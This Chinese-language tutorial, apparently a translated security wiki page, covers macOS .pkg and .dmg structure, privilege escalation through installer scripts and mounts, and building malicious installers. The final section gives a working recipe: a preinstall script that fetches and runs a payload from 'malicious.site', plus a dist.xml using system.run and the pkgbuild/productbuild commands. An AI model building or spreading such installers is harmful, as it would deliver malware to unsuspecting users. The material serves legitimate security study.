Pkg 基本信息
macOS 安装包 (也称为 .pkg
文件)是一种文件格式,用于 macOS 分发软件 。这些文件就像一个包含软件安装和正常运行所需一切的盒子 。
包文件本身是一个存档,包含一个将在目标计算机上安装的文件和目录的层次结构 。它还可以包括脚本 ,在安装前后执行任务,例如设置配置文件或清理旧版本的软件。
层次结构
分发 (xml) :自定义(标题、欢迎文本……)和脚本/安装检查
PackageInfo (xml) :信息、安装要求、安装位置、要运行的脚本路径
材料清单 (bom) :要安装、更新或删除的文件列表及文件权限
有效载荷 (CPIO 存档 gzip 压缩) :从 PackageInfo 中在 install-location
安装的文件
脚本 (CPIO 存档 gzip 压缩) :安装前和安装后脚本以及提取到临时目录以供执行的更多资源。
解压缩
Copy # Tool to directly get the files inside a package
pkgutil —expand "/path/to/package.pkg" "/path/to/out/dir"
# Get the files ina. more manual way
mkdir -p "/path/to/out/dir"
cd "/path/to/out/dir"
xar -xf "/path/to/package.pkg"
# Decompress also the CPIO gzip compressed ones
cat Scripts | gzip -dc | cpio -i
cpio -i < Scripts
为了在不手动解压缩安装程序的情况下可视化其内容,您还可以使用免费的工具 Suspicious Package 。
DMG 基本信息
DMG 文件,或称 Apple 磁盘映像,是苹果 macOS 用于磁盘映像的文件格式。DMG 文件本质上是一个 可挂载的磁盘映像 (它包含自己的文件系统),其中包含通常被压缩且有时被加密的原始块数据。当您打开 DMG 文件时,macOS 将其挂载,就像它是一个物理磁盘 ,允许您访问其内容。
请注意,.dmg
安装程序支持 如此多的格式 ,以至于在过去,一些包含漏洞的格式被滥用以获得 内核代码执行 。
层级结构
DMG 文件的层级结构可以根据内容而有所不同。然而,对于应用程序 DMG,它通常遵循以下结构:
顶层:这是磁盘映像的根。它通常包含应用程序,并可能包含指向应用程序文件夹的链接。
应用程序 (.app):这就是实际的应用程序。在 macOS 中,应用程序通常是一个包含许多单独文件和文件夹的包,这些文件和文件夹构成了该应用程序。
应用程序链接:这是指向 macOS 中应用程序文件夹的快捷方式。这样做的目的是方便您安装应用程序。您可以将 .app 文件拖到此快捷方式上以安装该应用程序。
通过 pkg 滥用进行特权提升
从公共目录执行
如果预安装或后安装脚本例如从 /var/tmp/Installerutil
执行,攻击者可以控制该脚本,从而在每次执行时提升特权。或者另一个类似的例子:
AuthorizationExecuteWithPrivileges
这是一个 公共函数 ,多个安装程序和更新程序将调用它以 以 root 身份执行某些操作 。此函数接受要 执行 的 文件 的 路径 作为参数,然而,如果攻击者能够 修改 此文件,他将能够 滥用 其以 root 身份执行以 提升特权 。
Copy # Breakpoint in the function to check wich file is loaded
( lldb ) b AuthorizationExecuteWithPrivileges
# You could also check FS events to find this missconfig
For more info check this talk: https://www.youtube.com/watch?v=lTOItyjTTkw
执行通过挂载
如果安装程序写入 /tmp/fixedname/bla/bla
,可以 创建一个挂载 在 /tmp/fixedname
上,没有所有者,这样你就可以 在安装过程中修改任何文件 来滥用安装过程。
一个例子是 CVE-2021-26089 ,它成功地 覆盖了一个定期脚本 以获得 root 权限。有关更多信息,请查看这个演讲: OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl
pkg 作为恶意软件
空载荷
可以仅生成一个 .pkg
文件,包含 安装前和安装后脚本 ,而没有任何实际载荷,除了脚本中的恶意软件。
分发 xml 中的 JS
可以在包的 分发 xml 文件中添加 <script>
标签,这段代码将被执行,并且可以 使用 system.run
执行命令 :
后门安装程序
恶意安装程序使用脚本和 dist.xml 中的 JS 代码
Copy # Package structure
mkdir -p pkgroot/root/Applications/MyApp
mkdir -p pkgroot/scripts
# Create preinstall scripts
cat > pkgroot/scripts/preinstall << EOF
#!/bin/bash
echo "Running preinstall script"
curl -o /tmp/payload.sh http://malicious.site/payload.sh
chmod +x /tmp/payload.sh
/tmp/payload.sh
exit 0
EOF
# Build package
pkgbuild --root pkgroot/root --scripts pkgroot/scripts --identifier com.malicious.myapp --version 1.0 myapp.pkg
# Generate the malicious dist.xml
cat > ./dist.xml << EOF
<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
<title>Malicious Installer</title>
<options customize="allow" require-scripts="false"/>
<script>
<![CDATA[
function installationCheck() {
if (system.isSandboxed()) {
my.result.title = "Cannot install in a sandbox.";
my.result.message = "Please run this installer outside of a sandbox.";
return false;
}
return true;
}
function volumeCheck() {
return true;
}
function preflight() {
system.run("/path/to/preinstall");
}
function postflight() {
system.run("/path/to/postinstall");
}
]]>
</script>
<choices-outline>
<line choice="default">
<line choice="myapp"/>
</line>
</choices-outline>
<choice id="myapp" title="MyApp">
<pkg-ref id="com.malicious.myapp"/>
</choice>
<pkg-ref id="com.malicious.myapp" installKBytes="0" auth="root">#myapp.pkg</pkg-ref>
</installer-gui-script>
EOF
# Buil final
productbuild --distribution dist.xml --package-path myapp.pkg final-installer.pkg
参考文献